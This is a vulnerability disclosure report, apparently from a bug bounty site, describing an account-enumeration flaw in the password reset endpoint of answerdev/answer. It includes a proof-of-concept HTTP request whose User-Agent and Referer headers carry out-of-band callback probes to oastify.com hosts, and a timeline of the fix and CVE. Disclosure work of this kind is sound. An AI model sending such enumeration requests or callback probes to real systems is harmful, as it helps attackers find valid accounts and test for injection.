Observable Response Discrepancy in Password Reset Functionality in answerdev/answer

Valid

Reported on

Feb 21st 2023

Description

The password reset functionality leaks information pertaining to use accounts. Where an invalid account is utilized, the application responds that the account could not be found. Where an account is valid, the application responds with a reason "base.success" (when intercepted), or that if an account with that name is identified it will receive an email (browser response).

Proof of Concept

POST /answer/api/v1/user/password/reset HTTP/1.1
Host: 192.168.1.66:9080
Content-Length: 90
Accept-Language: en_US
Authorization: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@qmg10q7skchmypqtyu1x6l92styvxslh.oastify.com
Content-Type: application/json
Accept: */*
Origin: http://192.168.1.66:9080
Referer: http://egypue1ge0basdkhsivl093qmhsjref3.oastify.com/ref
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: no-transform

{"e_mail":"testemail@email.com","captcha_code":"4a2u","captcha_id":"EmC1gF0NkgvUvCdHAu7z"}

Impact

An attacker can identify valid user email accounts which permits the attacker to increase the application's attack surface.

Occurrences

Where a bad username is provided the response is UserNotFound as reason.

We are processing your report and will contact the answerdev/answer team within 24 hours. 3 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back 3 months ago
Joe Helle modified the report
3 months ago
joyqi validated this vulnerability 2 months ago
Joe Helle has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
joyqi marked this as fixed in 1.0.6 with commit 1de3ec 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
joyqi published this vulnerability 2 months ago
user_service.go#L158 has been validated
to join this conversation